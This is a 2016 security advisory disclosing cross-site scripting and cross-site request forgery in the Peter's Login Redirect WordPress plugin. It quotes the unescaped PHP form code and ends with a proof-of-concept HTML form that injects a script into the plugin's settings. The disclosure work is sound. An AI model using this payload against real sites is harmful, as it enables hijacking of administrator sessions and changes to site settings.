Advisory

Yorick Koster, July 2016

Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login Redirect WordPress Plugin

Abstract

A Cross-Site Scripting vulnerability was found in the Peter's Login Redirect WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In addition the Plugin is vulnerable to Cross-Site Request Forgery, which allows an attacker to change any setting of this plugin. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

OVE ID

OVE-20160724-0028

Tested versions

This issue was successfully tested on Peter's Login Redirect WordPress Plugin version 2.9.0.

Fix

This issue is resolved in Peter's Login Redirect version 2.9.1.

Introduction

The Peter's Login Redirect WordPress Plugin redirect users to different locations after logging in and logging out. A Cross-Site Scripting vulnerability was found in the Peter's Login Redirect WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In addition the Plugin is vulnerable to Cross-Site Request Forgery, which allows an attacker to change any setting of this plugin.

Details

This issue exists because Peter's Login Redirect lacks protection against Cross-Site Request Forgery attacks. In addition, the plugin lacks proper output encoding, rendering it vulnerable to Cross-Site Scripting. See for example the following code fragment.

elseif( $rul_type == 'role' )
{
   $rul_rolevalues .= '<form name="rul_role_edit_form[' . $i_role . ']" action="?page=' . basename(__FILE__) . '" method="post">';
   $rul_rolevalues .= '<tr>';
   $rul_rolevalues .= '<td><p><input type="hidden" name="rul_role" value="' . $rul_value . '" /> ' . $rul_value . '</p></td>';
   $rul_rolevalues .= '<td>';
   $rul_rolevalues .= '<p>' . __('Login URL', 'peters-login-redirect' ) . '<br /><input type="text" size="90" maxlength="500" name="rul_role_address" value="' . $rul_url . '" /></p>';
   $rul_rolevalues .= '<p>' . __('Logout URL', 'peters-login-redirect' ) . '<br /><input type="text" size="60" maxlength="500" name="rul_role_logout" value="' . $rul_url_logout . '" /></p>';
   $rul_rolevalues .= '</td>';
   $rul_rolevalues .= '<td><p><input name="rul_role_edit" type="submit" value="' . __( 'Edit', 'peters-login-redirect' ) . '" /> <input type="submit" name="rul_role_delete" value="' . __( 'Delete', 'peters-login-redirect' ) . '" /></p></td>';
   $rul_rolevalues .= '</tr>';
   $rul_rolevalues .= '</form>';

   $rul_roles_existing[$rul_value] = '';

   ++$i_role;
}

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
   <body>
      <form action="http://<target>/wp-admin/options-general.php?page=wplogin_redirect.php" method="POST">
         <input type="hidden" name="rul&#95;role" value="administrator" />
         <input type="hidden" name="rul&#95;role&#95;address" value="&quot;><script>alert(1);</script>" />
         <input type="hidden" name="rul&#95;role&#95;logout" value="" />
         <input type="hidden" name="rul&#95;role&#95;submit" value="Add&#32;role&#32;rule" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>

Work with us →